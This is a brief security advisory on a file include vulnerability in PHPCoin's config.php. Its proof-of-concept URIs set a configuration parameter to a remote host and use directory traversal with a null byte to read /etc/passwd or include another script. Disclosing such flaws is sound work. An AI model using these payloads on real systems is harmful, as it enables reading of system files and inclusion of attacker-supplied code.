|
PHPCoin Config.PHP File Include Vulnerability
No exploit is required. Example URI and a proof of concept exploit are available: http://www.example.com/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.example.com http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00 http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00 |
|
|
Privacy Statement |
